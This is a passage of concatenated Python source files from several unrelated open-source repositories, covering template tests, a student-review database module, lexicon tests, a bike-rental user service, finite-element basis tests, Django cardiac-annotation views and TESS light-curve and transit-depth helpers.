def test_post_ask_question_validationerror_non_interactive(self):
from ..bobexceptions import ConfigurationError, ValidationError
mocked_post_ask_question_validationerror_non_interactive.side_effect = ValidationError
q = self.call_FUT('foo',
'Why?',
command_prompt=lambda x: '',
post_ask_question="mrbob.tests.test_configurator:mocked_post_ask_question_validationerror_non_interactive")
c = DummyConfigurator(bobconfig={'non_interactive': 'True'})
self.assertRaises(ConfigurationError, q.ask, c)
```
#### File: jpcw/mr.bob/setup.py
```python
import os
import sys
import codecs
from setuptools import setup
from setuptools import find_packages
install_requires = [
'setuptools',
'six>=1.2.0', # 1.1.0 release doesn't have six.moves.input
]
if (3,) < sys.version_info < (3, 3):
# Jinja 2.7 drops Python 3.2 compat.
install_requires.append('Jinja2>=2.5.0,<2.7dev')
else:
install_requires.append('Jinja2>=2.5.0')
try:
import importlib # NOQA
except ImportError:
install_requires.append('importlib')
try:
from collections import OrderedDict # NOQA
except ImportError:
install_requires.append('ordereddict')
try:
import argparse # NOQA
except ImportError:
install_requires.append('argparse')
def read(*rnames):
return codecs.open(os.path.join(os.path.dirname(__file__), *rnames), 'r', 'utf-8').read()
setup(name='mr.bob',
version='0.2.dev0',
description='Bob renders directory structure templates',
long_description=read('README.rst') + '\n' + read('HISTORY.rst'),
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
],
author='<NAME>, <NAME>',
author_email='',
url='https://github.com/iElectric/mr.bob.git',
license='BSD',
packages=find_packages(),
install_requires=install_requires,
extras_require={
'test': [
'nose',
'coverage<3.6dev',
'flake8>2.0',
'mock',
],
'development': [
'zest.releaser',
'Sphinx',
],
},
entry_points="""
[console_scripts]
mrbob = mrbob.cli:main
""",
include_package_data=True,
zip_safe=False,
)
``` |
{
"source": "jpcyrino/a24systeme",
"score": 3
} |
#### File: a24systeme/a24s/reviews.py
```python
from .db import DBFactory
from .users import user_column_names
from uuid import uuid4, UUID
from psycopg2.extras import register_uuid
from datetime import datetime
from werkzeug.exceptions import abort
def _get_tutor_with_least_fullfillments_to_review():
register_uuid()
query = """
SELECT count(reviewer), users.id FROM review
FULL OUTER JOIN users ON review.reviewer=users.id
WHERE NOT users.role='student'
GROUP BY users.id ORDER BY count ASC;
"""
_, fetch, _ = DBFactory().start()
response = fetch(query)
if len(response) < 2:
return ('', 204)
return response[1]
def exec_create_review_for_fullfillment(fullfillment_id):
register_uuid()
if type(fullfillment_id) is not UUID:
UUID(fullfillment_id)
reviewer_id = _get_tutor_with_least_fullfillments_to_review()
review_id = uuid4()
query = """
INSERT INTO review (id,fullfillment,reviewer,created)
VALUES (%s, %s, %s,%s);
"""
data = (review_id,fullfillment_id,reviewer_id,datetime.now())
execute, *_ = DBFactory().start()
execute(query, data)
return { "id": review_id }
def exec_update_review(review_id, review_dict):
register_uuid()
if type(review_id) is not UUID:
UUID(review_id)
query = """
UPDATE review SET content=%s, grade=%s
WHERE id=%s;
"""
try:
data = (
review_dict["content"],
review_dict["grade"],
review_id
)
except:
abort(400)
execute, *_ = DBFactory().start()
execute(query, data)
return { "id": review_id, "content": review_dict["content"], "grade": review_dict["grade"]}
review_column_names = (
"id",
"fullfillment",
"reviewer",
"content",
"grade",
"created",
"sent"
)
def exec_get_reviews_by_reviewer_id(reviewer_id):
register_uuid()
if type(reviewer_id) is not UUID:
UUID(reviewer_id)
query = "SELECT * FROM review WHERE reviewer=%s;"
data = (reviewer_id, )
_,_,fetchall = DBFactory().start()
response = fetchall(query,data)
if response is None:
return ('',204)
return [dict(zip(review_column_names,r)) for r in response]
def exec_get_review_by_fullfillment_id(fullfillment_id):
register_uuid()
if type(fullfillment_id) is not UUID:
UUID(fullfillment_id)
query = "SELECT * FROM review WHERE fullfillment=%s;"
data = (fullfillment_id, )
_,fetch,_ = DBFactory().start()
response = fetch(query,data)
if response is None:
return ('',204)
return dict(zip(review_column_names,response))
def exec_send_review(review_id):
register_uuid()
if type(review_id) is not UUID:
UUID(review_id)
query = "UPDATE review SET sent=%s WHERE id=%s;"
data = (True, review_id)
execute, *_ = DBFactory().start()
execute(query,data)
return { "id": review_id }
def exec_delete_review(review_id):
register_uuid()
if type(review_id) is not UUID:
UUID(review_id)
query = "DELETE review WHERE id=%s;"
data = (review_id, )
execute, *_ = DBFactory().start()
execute(query,data)
return ('',204)
def exec_get_reviews():
query = "SELECT * FROM review;"
_,_,fetchall = DBFactory().start()
response = fetchall(query)
if response is None:
return ('',204)
return [dict(zip(review_column_names,r)) for r in response]
def exec_get_review(review_id):
register_uuid()
if type(review_id) is not UUID:
UUID(review_id)
query = "SELECT * FROM review WHERE id=%s;"
data = (review_id, )
_, fetch, _ = DBFactory().start()
response = fetch(query, data)
if response is None:
return ('', 204)
return dict(zip(review_column_names, result))
``` |
{
"source": "jpcyrino/chunker_dm",
"score": 3
} |
#### File: chunker_dm/tests/test_lexicon.py
```python
import unittest as ut
from chunker_dm.lexicon import Lexicon, ProbabilityLexicon, ComplexityLexicon
class TestLexicon(ut.TestCase):
def test_lexicon_adds_tokens_from_text(self):
lex = Lexicon()
lex.add("Isso é uma frase")
self.assertEqual(lex.total(), 4)
def test_lexicon_counts_frequency_of_word(self):
lex = Lexicon()
lex.add("Essa aqui é uma frase para testar uma classe de Léxico")
self.assertEqual(lex.frequency("uma"), 2)
self.assertEqual(lex.frequency("frase"),1)
def test_lexicon_tokenizes_properly(self):
lex = Lexicon()
lex.add("Uma frase.")
self.assertEqual(lex.frequency("frase"),1)
self.assertEqual(lex.frequency("frase."),0)
def test_gets_frequency_dict(self):
lex = Lexicon()
lex.add("Uma frase.")
fdict = lex.frequency_dict()
self.assertIs(type(fdict), dict)
self.assertEqual(fdict["uma"], 1)
class TestProbabilityLexicon(ut.TestCase):
def test_gets_probability_of_token(self):
plex = ProbabilityLexicon()
plex.add("Duas palavras.")
self.assertEqual(plex.probability("duas"),0.5)
self.assertEqual(plex.probability("palavras"),0.5)
def test_gets_probability_dict(self):
plex = ProbabilityLexicon()
plex.add("Uma frase.")
pdict = plex.probability_dict()
self.assertIs(type(pdict), dict)
self.assertEqual(pdict["uma"], 0.5)
class TestComplexityLexicon(ut.TestCase):
def test_returns_null_when_token_not_found(self):
clex = ComplexityLexicon()
clex.add("Uma frase.")
self.assertTrue(clex.complexity("frase"))
self.assertFalse(clex.complexity("cachorro"))
def test_gets_complexity_dict(self):
clex = ComplexityLexicon()
clex.add("Uma frase.")
cdict = clex.complexity_dict()
self.assertIs(type(cdict), dict)
self.assertEqual(cdict["uma"], 1)
``` |
{
"source": "jpdarricarrere/Trabalho_Eng_Software",
"score": 3
} |
#### File: bike-manager-be/emprestimo/ServicoEmprestimo.py
```python
class ServicoEmprestimo():
def __init__(self):
self._servico_bike = None
def set_servico_bike(self, servico_bike):
self._servico_bike = servico_bike
def reserva_bike(self, id_bike):
if self._servico_bike is None:
raise('ServicoEmprestimo nao possui forma de chega em bikes. Verifique se uma referencia para o servico de bikes foi passada a ele.')
self._servico_bike.aluga_bike(id_bike)
```
#### File: bike-manager-be/usuario/ServicoUsuario.py
```python
from datetime import datetime
from typing import Optional
from .Usuario import Usuario
from .TipoUsuario import TipoUsuario
from .persistencia.InMemoryRepositorioUsuario import InMemoryRepositorioUsuario as RepositorioUsuario
class ServicoUsuario:
def listar_todos() -> 'list[Usuario]':
return RepositorioUsuario.get_all()
def criar(tipo: TipoUsuario, nome: str, ano_nascimento: int, mes_nascimento: int, dia_nascimento: int, email: str, senha: str):
data_nascimento = datetime(ano_nascimento, mes_nascimento, dia_nascimento)
novo_usuario = Usuario(None, tipo, nome, data_nascimento, email, senha)
usuario_persistido = RepositorioUsuario.save(novo_usuario)
return usuario_persistido
def encontrar(id: int) -> Optional[Usuario]:
return RepositorioUsuario.find_one(id)
def atualizar(id: int, tipo: TipoUsuario, nome: str, ano_nascimento: int, mes_nascimento: int, dia_nascimento: int, email: str, senha: str):
atual = RepositorioUsuario.find_one(id)
n_tipo = tipo if tipo is not None else atual.tipo
n_nome = nome if nome is not None else atual.nome
atual_data_nasc = atual.get_data_nascimento()
n_ano = ano_nascimento if ano_nascimento is not None else atual_data_nasc.year
n_mes = mes_nascimento if mes_nascimento is not None else atual_data_nasc.month
n_dia = dia_nascimento if dia_nascimento is not None else atual_data_nasc.day
n_data_nascimento = datetime(n_ano, n_mes, n_dia)
n_email = email if email is not None else atual.email
n_senha = senha if senha is not None else atual.senha
n_usuario = Usuario(id, n_tipo, n_nome, n_data_nascimento, n_email, n_senha)
usuario_persistido = RepositorioUsuario.save(n_usuario)
return usuario_persistido
def deletar(id: int):
RepositorioUsuario.delete(id)
``` |
{
"source": "jpdean/basix",
"score": 2
} |
#### File: basix/test/test_rt.py
```python
import basix
import numpy
import pytest
import sympy
from .test_lagrange import sympy_lagrange
def sympy_rt(celltype, n):
x = sympy.Symbol("x")
y = sympy.Symbol("y")
z = sympy.Symbol("z")
from sympy import S
topology = basix.topology(celltype)
geometry = S(basix.geometry(celltype).astype(int))
dummy = [sympy.Symbol("DUMMY1"), sympy.Symbol("DUMMY2"), sympy.Symbol("DUMMY3")]
funcs = []
if celltype == basix.CellType.triangle:
tdim = 2
for i in range(n):
for j in range(n - i):
for d in range(2):
funcs += [[x**j * y**i if k == d else 0 for k in range(2)]]
for i in range(n):
funcs.append([x ** (n - i) * y ** i, x ** (n - 1 - i) * y ** (i + 1)])
mat = numpy.empty((len(funcs), len(funcs)), dtype=object)
# edge normals
for i, f in enumerate(funcs):
if n == 1:
edge_basis = [sympy.Integer(1)]
else:
edge_basis = sympy_lagrange(basix.CellType.interval, n - 1)
edge_basis = [a.subs(x, dummy[0]) for a in edge_basis]
j = 0
for edge in topology[1]:
edge_geom = [geometry[t, :] for t in edge]
tangent = edge_geom[1] - edge_geom[0]
norm = sympy.sqrt(sum(i ** 2 for i in tangent))
tangent = [i / norm for i in tangent]
normal = [-tangent[1], tangent[0]]
param = [(1 - dummy[0]) * a + dummy[0] * b for a, b in zip(edge_geom[0], edge_geom[1])]
for g in edge_basis:
integrand = sum((f_i * v_i) for f_i, v_i in zip(f, normal))
integrand = integrand.subs(x, param[0]).subs(y, param[1])
integrand *= g * norm
mat[i, j] = integrand.integrate((dummy[0], 0, 1))
j += 1
# interior dofs
if n > 1:
for i, f in enumerate(funcs):
if n == 2:
face_basis = [sympy.Integer(1)]
else:
face_basis = sympy_lagrange(basix.CellType.triangle, n - 2)
j = n * 3
for g in face_basis:
for vec in [(1, 0), (0, 1)]:
integrand = sum((f_i * v_i) for f_i, v_i in zip(f, vec)) * g
mat[i, j] = integrand.integrate((x, 0, 1 - y)).integrate((y, 0, 1))
j += 1
elif celltype == basix.CellType.tetrahedron:
tdim = 3
for i in range(n):
for j in range(n - i):
for k in range(n - i - j):
for d in range(3):
funcs += [[x**k * y**j * z**i if m == d else 0 for m in range(3)]]
for j in range(n):
for k in range(n - j):
p = x ** (n - 1 - j - k) * y ** j * z ** k
funcs.append((x * p, y * p, z * p))
mat = numpy.empty((len(funcs), len(funcs)), dtype=object)
# face normals
for i, f in enumerate(funcs):
if n == 1:
face_basis = [sympy.Integer(1)]
else:
face_basis = sympy_lagrange(basix.CellType.triangle, n - 1)
face_basis = [a.subs(x, dummy[0]).subs(y, dummy[1]) for a in face_basis]
j = 0
for face in topology[2]:
face_geom = [geometry[t, :] for t in face]
axes = [face_geom[1] - face_geom[0], face_geom[2] - face_geom[0]]
normal = [axes[0][1] * axes[1][2] - axes[0][2] * axes[1][1],
axes[0][2] * axes[1][0] - axes[0][0] * axes[1][2],
axes[0][0] * axes[1][1] - axes[0][1] * axes[1][0]]
norm = sympy.sqrt(sum(i**2 for i in normal))
normal = [k / norm for k in normal]
param = [a + dummy[0] * b + dummy[1] * c for a, b, c in zip(face_geom[0], *axes)]
for g in face_basis:
integrand = sum(f_i * v_i for f_i, v_i in zip(f, normal))
integrand = integrand.subs(x, param[0]).subs(y, param[1]).subs(z, param[2])
integrand *= g * norm
mat[i, j] = integrand.integrate((dummy[0], 0, 1 - dummy[1])).integrate((dummy[1], 0, 1))
j += 1
assert j == 2 * n * (n + 1)
if n > 1:
for i, f in enumerate(funcs):
if n == 2:
interior_basis = [sympy.Integer(1)]
else:
interior_basis = sympy_lagrange(basix.CellType.tetrahedron, n - 2)
j = 2 * n * (n + 1)
for g in interior_basis:
for vec in [(1, 0, 0), (0, 1, 0), (0, 0, 1)]:
integrand = sum(f_i * v_i for f_i, v_i in zip(f, vec))
integrand *= g
mat[i, j] = integrand.integrate((x, 0, 1 - y - z)).integrate((y, 0, 1 - z)).integrate((z, 0, 1))
j += 1
mat = sympy.Matrix(mat)
mat = mat.inv()
g = []
for dim in range(tdim):
for r in range(mat.shape[0]):
g += [sum([v * funcs[i][dim] for i, v in enumerate(mat.row(r))])]
return g
@pytest.mark.parametrize("order", [1, 2, 3])
def test_tri(order):
celltype = basix.CellType.triangle
g = sympy_rt(celltype, order)
x = sympy.Symbol("x")
y = sympy.Symbol("y")
rt = basix.create_element(basix.ElementFamily.RT, basix.CellType.triangle, order)
pts = basix.create_lattice(celltype, 1, basix.LatticeType.equispaced, True)
nderiv = 3
wtab = rt.tabulate(nderiv, pts)
for kx in range(nderiv):
for ky in range(0, nderiv - kx):
wsym = numpy.zeros_like(wtab[0])
for i in range(len(g)):
wd = sympy.diff(g[i], x, kx, y, ky)
for j, p in enumerate(pts):
wsym[j, i] = wd.subs([(x, p[0]), (y, p[1])])
assert(numpy.isclose(wtab[basix.index(kx, ky)], wsym).all())
@pytest.mark.parametrize("order", [1, 2, 3])
def test_tet(order):
celltype = basix.CellType.tetrahedron
g = sympy_rt(celltype, order)
x = sympy.Symbol("x")
y = sympy.Symbol("y")
z = sympy.Symbol("z")
rt = basix.create_element(basix.ElementFamily.RT, basix.CellType.tetrahedron, order)
pts = basix.create_lattice(celltype, 5, basix.LatticeType.equispaced, True)
nderiv = 1
wtab = rt.tabulate(nderiv, pts)
for k in range(nderiv + 1):
for q in range(k + 1):
for kx in range(q + 1):
ky = q - kx
kz = k - q
wsym = numpy.zeros_like(wtab[0])
for i in range(len(g)):
wd = sympy.diff(g[i], x, kx, y, ky, z, kz)
for j, p in enumerate(pts):
wsym[j, i] = wd.subs([(x, p[0]),
(y, p[1]),
(z, p[2])])
assert(numpy.isclose(wtab[basix.index(kx, ky, kz)], wsym).all())
``` |
{
"source": "jpdefrutosSINTEF/annotationweb_lung",
"score": 2
} |
#### File: annotationweb_lung/cardiac_apical_long_axis/views.py
```python
from django.conf import settings
from django.contrib.admin.views.decorators import staff_member_required
import json
from django.shortcuts import render, redirect
from django.contrib import messages
from django.http import HttpResponse, Http404, JsonResponse, HttpResponseRedirect
import random
from io import StringIO, BytesIO
import base64
from annotationweb.settings import BASE_DIR
from common.metaimage import *
import numpy as np
from annotationweb.models import Task, ImageAnnotation, Label
from common.utility import get_image_as_http_response
import common.task
from annotationweb.models import KeyFrameAnnotation
from spline_segmentation.models import ControlPoint
from django.db import transaction
def segment_next_image(request, task_id):
return segment_image(request, task_id, None)
def add_default_labels(task_id):
# Check if task has proper labels set up.
# If not add them to the database,
task = Task.objects.get(pk=task_id)
labels = (
('Endocardium', (0, 255, 0)),
('Epicardium', (0, 0, 255)),
('Left atrium', (255, 0, 0)),
('Aorta', (150, 70, 50)),
)
if len(task.label.all()) != 4:
# Remove old ones
for label in task.label.all():
task.label.remove(label)
print('Adding labels to task')
for label in labels:
try:
# Check if already exist
label_obj = Label.objects.get(name=label[0])
except Label.DoesNotExist:
label_obj = Label()
label_obj.name = label[0]
label_obj.color_red = label[1][0]
label_obj.color_green = label[1][1]
label_obj.color_blue = label[1][2]
label_obj.save()
task.label.add(label_obj)
task.save()
def segment_image(request, task_id, image_id):
add_default_labels(task_id)
try:
context = common.task.setup_task_context(request, task_id, Task.CARDIAC_ALAX_SEGMENTATION, image_id)
image_id = context['image'].id # Because image_id can initially be None
context['javascript_files'] = ['cardiac_apical_long_axis/segmentation.js']
# Check if image is already segmented, if so get data and pass to template
try:
annotations = KeyFrameAnnotation.objects.filter(image_annotation__task_id=task_id,
image_annotation__image_id=image_id)
control_points = ControlPoint.objects.filter(image__in=annotations).order_by('index')
context['control_points'] = control_points
context['target_frames'] = annotations
except KeyFrameAnnotation.DoesNotExist:
pass
return render(request, 'cardiac_apical_long_axis/segment_image.html', context)
except common.task.NoMoreImages:
messages.info(request, 'This task is finished, no more images to segment.')
return redirect('index')
except RuntimeError as e:
messages.error(request, str(e))
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
def save_segmentation(request):
error_messages = ''
motion_mode_line = int(round(float(request.POST['motion_mode_line'])))
control_points = json.loads(request.POST['control_points'])
target_frame_types = json.loads(request.POST['target_frame_types'])
print(control_points)
objects = ('Endocardium', 'Epicardium', 'Left atrium', 'Aorta')
rejected = request.POST['rejected'] == 'true'
if not rejected:
for frame_nr in control_points.keys():
for i in range(len(objects)):
if str(i) in control_points[frame_nr] and \
len(control_points[frame_nr][str(i)]['control_points']) < 1:
error_messages += objects[i] + ' annotation missing in frame ' + str(frame_nr) + '<br>'
if len(error_messages):
response = {
'success': 'false',
'message': error_messages,
}
else:
try:
# Use atomic transaction here so if something crashes the annotations are restored..
with transaction.atomic():
annotations = common.task.save_annotation(request)
# Save segmentation
# Save control points
for annotation in annotations:
frame_nr = str(annotation.frame_nr)
# Set frame metadata
annotation.frame_metadata = target_frame_types[frame_nr]
annotation.save()
for object in control_points[frame_nr]:
nr_of_control_points = len(control_points[frame_nr][object]['control_points'])
if nr_of_control_points < 2:
continue
for point in range(nr_of_control_points):
control_point = ControlPoint()
control_point.image = annotation
control_point.x = float(control_points[frame_nr][object]['control_points'][point]['x'])
control_point.y = float(control_points[frame_nr][object]['control_points'][point]['y'])
control_point.index = point
control_point.object = int(object)
# TODO modify this line to have proper label:
control_point.label = Label.objects.get(id=int(control_points[frame_nr][object]['label']['id']))
control_point.uncertain = bool(
control_points[frame_nr][object]['control_points'][point]['uncertain'])
control_point.save()
response = {
'success': 'true',
'message': 'Annotation saved',
}
except Exception as e:
response = {
'success': 'false',
'message': str(e),
}
return JsonResponse(response)
def show_segmentation(request, task_id, image_id):
pass
``` |
{
"source": "jpdeleon/archive_digger",
"score": 2
} |
#### File: jpdeleon/archive_digger/setup.py
```python
import os
import sys
import re
try:
from setuptools import setup
setup
except ImportError:
from distutils.core import setup
setup
if sys.argv[-1] == "publish":
os.system("python setup.py sdist upload")
sys.exit()
# Handle encoding
major, minor1, minor2, release, serial = sys.version_info
if major >= 3:
def rd(filename):
f = open(filename, encoding="utf-8")
r = f.read()
f.close()
return r
else:
def rd(filename):
f = open(filename)
r = f.read()
f.close()
return r
setup(
name='archive_digger',
packages =['archive_digger'],
version="0.1.1",
author='<NAME>',
author_email = '<EMAIL>',
url = 'https://github.com/jpdeleon/archive_digger',
license = ['GNU GPLv3'],
description ='simple query for archival radial velocity data of TESS targets',
long_description=rd("README.md") + "\n\n"
+ "---------\n\n",
package_dir={"exofop": "exofop"},
#package_data={"data": []},
scripts=['scripts/query_harps'],
#include_package_data=True,
keywords=[],
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Programming Language :: Python'
],
install_requires = ['pandas','astropy','astroplan','tqdm'],
)
``` |
{
"source": "jpdeleon/chronos",
"score": 2
} |
#### File: chronos/chronos/qlp.py
```python
r"""
classes for working with lightcurves from the QLP pipeline:
http://archive.stsci.edu/hlsp/qlp
"""
# Import standard library
from pathlib import Path
import logging
# Import library
import numpy as np
import pandas as pd
import matplotlib.pyplot as pl
import astropy.units as u
import lightkurve as lk
from astropy.io import fits
# Import from package
from chronos.config import DATA_PATH
from chronos.target import Target
from chronos.tpf import FFI_cutout
# from chronos.plot import plot_tls, plot_odd_even
from chronos.utils import get_transit_mask, parse_aperture_mask, TessLightCurve
log = logging.getLogger(__name__)
__all__ = ["QLP"]
QLP_SECTORS = np.arange(11, 27, 1)
class QLP(Target):
"""
http://archive.stsci.edu/hlsp/qlp
"""
def __init__(
self,
sector=None,
name=None,
toiid=None,
ticid=None,
epicid=None,
gaiaDR2id=None,
ra_deg=None,
dec_deg=None,
quality_bitmask=None,
search_radius=3,
aper="best",
lctype="KSPSAP",
mission="tess",
verbose=True,
clobber=True,
):
super().__init__(
name=name,
toiid=toiid,
ticid=ticid,
epicid=epicid,
gaiaDR2id=gaiaDR2id,
ra_deg=ra_deg,
dec_deg=dec_deg,
search_radius=search_radius,
verbose=verbose,
)
"""Initialize QLP.
See http://archive.stsci.edu/hlsp/qlp
Attributes
----------
lctype : str
KSPSAP : Normalized light curve detrended by kepler spline
aper : str
best, small, large
"""
self.sector = sector
if self.sector is None:
print(f"Available sectors: {self.all_sectors}")
if len(self.all_sectors) != 1:
idx = [
True if s in QLP_SECTORS else False
for s in self.all_sectors
]
if sum(idx) == 0:
msg = f"QLP lc is currently available for sectors={QLP_SECTORS}\n"
raise ValueError(msg)
if sum(idx) == 1:
self.sector = self.all_sectors[idx][
0
] # get first available
else:
self.sector = self.all_sectors[idx][
0
] # get first available
# get first available
print(
f"QLP lc may be available for sectors {self.all_sectors[idx]}"
)
print(f"Using sector={self.sector}.")
if self.gaiaid is None:
_ = self.query_gaia_dr2_catalog(return_nearest_xmatch=True)
self.aper = aper
self.apers = ["best", "small", "large"]
if self.aper not in self.apers:
raise ValueError(f"Type not among {self.apers}")
self.quality_bitmask = quality_bitmask
self.fits_url = None
self.hdulist = None
self.header0 = None
self.lctype = lctype.upper()
self.lctypes = ["SAP", "KSPSAP"]
if self.lctype not in self.lctypes:
raise ValueError(f"Type not among {self.lctypes}")
self.data, self.header = self.get_qlp_fits()
self.lc = self.get_qlp_lc()
self.lc.targetid = self.ticid
self.cadence = self.header["TIMEDEL"] * u.d
self.time = self.lc.time
self.flux = self.lc.flux
self.err = self.lc.flux_err
self.sap_mask = "round"
self.threshold_sigma = 5 # dummy
self.percentile = 95 # dummy
self.cutout_size = (15, 15) # dummy
self.aper_radius = None
self.tpf_tesscut = None
self.ffi_cutout = None
self.aper_mask = None
self.contratio = None
def get_qlp_url(self):
"""
hlsp_qlp_tess_ffi_<sector>-<tid>_tess_v01_llc.<exten>
where:
<sector> = The Sector represented as a 4-digit, zero-padded string,
preceded by an 's', e.g., 's0026' for Sector 26.
<tid> = The full, 16-digit, zeo-padded TIC ID.
<exten> = The light curve data type, either "fits" or "txt".
"""
base = "https://archive.stsci.edu/hlsps/qlp/"
assert self.sector is not None
sec = str(self.sector).zfill(4)
tic = str(self.ticid).zfill(16)
fp = (
base
+ f"s{sec}/{tic[:4]}/{tic[4:8]}/{tic[8:12]}/{tic[12:16]}/hlsp_qlp_tess_ffi_s{sec}-{tic}_tess_v01_llc.fits"
)
return fp
def get_qlp_fits(self):
"""get qlp target and light curve header and data
"""
fp = self.get_qlp_url()
try:
hdulist = fits.open(fp)
if self.verbose:
print(hdulist.info())
lc_data = hdulist[1].data
lc_header = hdulist[1].header
# set
self.fits_url = fp
self.hdulist = hdulist
self.header0 = hdulist[0].header
return lc_data, lc_header
except Exception:
msg = f"File not found:\n{fp}\n"
raise ValueError(msg)
def get_qlp_lc(self, lc_type=None, aper=None, sort=True):
"""
Parameters
----------
lc_type : str
{SAP, KSPSAP}
"""
lc_type = lc_type.upper() if lc_type is not None else self.lctype
aper = aper.upper() if aper is not None else self.aper
assert lc_type in self.lctypes
assert aper in self.apers
if self.verbose:
print(f"Using QLP {lc_type} (rad={self.aper}) lightcurve.")
time = self.data["TIME"] + 2457000 # BJD, days
if aper == "small":
flux = self.data["KSPSAP_FLUX_SML"]
elif aper == "large":
flux = self.data["KSPSAP_FLUX_LAG"]
else:
flux = self.data[f"{lc_type}_FLUX"]
if lc_type == "KSPSAP":
err = self.data[f"{lc_type}_FLUX_ERR"]
else:
err = np.ones_like(flux) * np.std(flux)
x = self.data["SAP_X"]
y = self.data["SAP_Y"]
quality = self.data["QUALITY"]
cadence = self.data["CADENCENO"]
if sort:
idx = np.argsort(time)
else:
idx = np.ones_like(time, bool)
# hack tess lightkurve
return TessLightCurve(
time=time[idx],
flux=flux[idx],
flux_err=err[idx],
# FIXME: only day works when using lc.to_periodogram()
time_format="jd", # TIMEUNIT is d in fits header
time_scale="tdb", # TIMESYS in fits header
centroid_col=x,
centroid_row=y,
quality=quality,
quality_bitmask=self.quality_bitmask,
cadenceno=cadence,
sector=self.sector,
targetid=self.toi_params["TIC ID"]
if self.toi_params is not None
else self.ticid,
ra=self.target_coord.ra.deg,
dec=self.target_coord.dec.deg,
label=None,
meta=None,
).normalize()
def validate_target_header(self):
"""
see self.header0
"""
raise NotImplementedError()
def get_aper_mask_qlp(self, sap_mask="round"):
"""
This is an estimate of QLP aperture based on
self.hdulist[1].header['BESTAP']
See:
https://archive.stsci.edu/hlsps/qlp/hlsp_qlp_tess_ffi_all_tess_v1_data-prod-desc.pdf
"""
rad = float(self.header["BESTAP"].split(":")[0])
self.aper_radius = round(rad)
print(f"Estimating QLP aperture using r={rad} pix.")
if self.ffi_cutout is None:
# first download tpf cutout
self.ffi_cutout = FFI_cutout(
sector=self.sector,
gaiaDR2id=self.gaiaid,
toiid=self.toiid,
ticid=self.ticid,
search_radius=self.search_radius,
quality_bitmask=self.quality_bitmask,
)
self.tpf_tesscut = self.ffi_cutout.get_tpf_tesscut()
aper_mask = parse_aperture_mask(
self.tpf_tesscut, sap_mask=sap_mask, aper_radius=self.aper_radius
)
self.aper_mask = aper_mask
return aper_mask
```
#### File: chronos/chronos/transit.py
```python
r"""
helper functions for transit modeling
"""
import matplotlib.pyplot as pl
import numpy as np
from scipy.optimize import newton
from astropy import units as u
from astropy import constants as c
import batman
LOG_TWO_PI = np.log(2 * np.pi)
__all__ = ["get_likelihoods_mass_grid", "get_HEB_depth_from_masses"]
def get_likelihoods_mass_grid(
m1,
m2s,
m3s,
obs,
log10age,
tracks,
feh,
bands=["TESS", "J", "H", "K"],
b=0,
use_tshape=False,
obs_min=0,
obs_max=1,
occultation=False,
):
"""
compute model likelihood over a mass grid of secondary and tertiary
stars in a HEB system. See also `plot_likelihood_grid`.
Parameters
----------
m1 : float
central star mass
m2s : list
list of secondary star masses
m3s : list
list of tertiary star masses
tracks : str
MIST isochrones track from isochrone
obs : tuple
(value, error) of the parameter of interest e.g. observed transit depth
log10age : float
age of the system
feh : float
metallicity of the system
bands : list
list of band
"""
errmsg = "obs must be a tuple of (value, error)"
assert isinstance(obs, tuple), errmsg
mass_grids = {}
for bp in bands:
mass_grid = np.zeros((len(m3s), len(m2s)))
for i, m2 in enumerate(m2s):
for j, m3 in enumerate(m3s):
if occultation:
calc = get_HEB_depth_from_masses(
m1,
m2,
m3,
tracks,
log10age,
feh,
band=bp,
occultation=True,
)
else:
calc = get_HEB_depth_from_masses(
m1,
m2,
m3,
tracks,
log10age,
feh,
band=bp,
occultation=False,
)
if use_tshape:
calc = tshape_approx(np.sqrt(calc), b=b)
# calc = max_k(calc)
if (calc >= obs_min) & (calc <= obs_max):
ll = likelihood(calc, obs[0], obs[1])
else:
ll = np.nan
mass_grid[j, i] = ll
mass_grids[bp] = mass_grid
return mass_grids
def get_HEB_depth_from_masses(
mass1,
mass2,
mass3,
tracks,
log10age,
feh,
F0=1,
band="TESS",
occultation=False,
):
"""
compute the passband-dependent eclipse depth given masses of the hierarchical system,
assuming MIST, b=0, and m3 eclipsing m2
Parameters
----------
mass1, mass2, mass3 : float
mass components of an HEB
tracks : obj
MIST isochrones track from isochrone
log10age : float
age of the system
feh : float
metallicity of the system
F0 : float
flux contamination factor
band : str
band
occultation : bool
compute depth during occultation (default=False)
"""
band = band + "_mag"
star1 = tracks.generate(mass1, log10age, feh, return_dict=True)
mag1 = star1[band]
star2 = tracks.generate(mass2, log10age, feh, return_dict=True)
mag2 = star2[band]
star3 = tracks.generate(mass3, log10age, feh, return_dict=True)
mag3 = star3[band]
# rstar1 = star1["radius"]
rstar2 = star2["radius"]
rstar3 = star3["radius"]
# mag = -2.5*log10(F/F0)
f1 = F0 * 10 ** (-0.4 * mag1)
f2 = F0 * 10 ** (-0.4 * mag2)
f3 = F0 * 10 ** (-0.4 * mag3)
# total flux during out of transit/eclipse
f_out = f1 + f2 + f3
if occultation:
# flux during eclipse
f_in = f1 + f2
else:
# flux during transit
f_in = f1 + f2 - f2 * (rstar3 / rstar2) ** 2 + f3
return 1 - f_in / f_out
def get_EB_depth_from_masses(
mass1, mass2, tracks, log10age, feh, F0=1, band="TESS", occultation=False
):
"""
compute the passband-dependent eclipse depth given masses of the binary system,
assuming MIST, b=0, and m2 eclipsing m1
Parameters
----------
mass1, mass2 : float
mass components of an EB
tracks : obj
MIST isochrones track from isochrone
log10age : float
age of the system
feh : float
metallicity of the system
F0 : float
flux contamination factor
band : str
band
occultation : bool
compute depth during occultation (default=False)
"""
assert mass1 >= mass2
band = band + "_mag"
star1 = tracks.generate(mass1, log10age, feh, return_dict=True)
mag1 = star1[band]
star2 = tracks.generate(mass2, log10age, feh, return_dict=True)
mag2 = star2[band]
rstar1 = star1["radius"]
rstar2 = star2["radius"]
# mag = -2.5*log10(F/F0)
f1 = F0 * 10 ** (-0.4 * mag1)
f2 = F0 * 10 ** (-0.4 * mag2)
# total flux during out of transit/eclipse
f_out = f1 + f2
if occultation:
# flux during eclipse
f_in = f1
else:
# flux during transit
f_in = f1 - f1 * (rstar2 / rstar1) ** 2 + f2
return 1 - f_in / f_out
def likelihood(model, data, err):
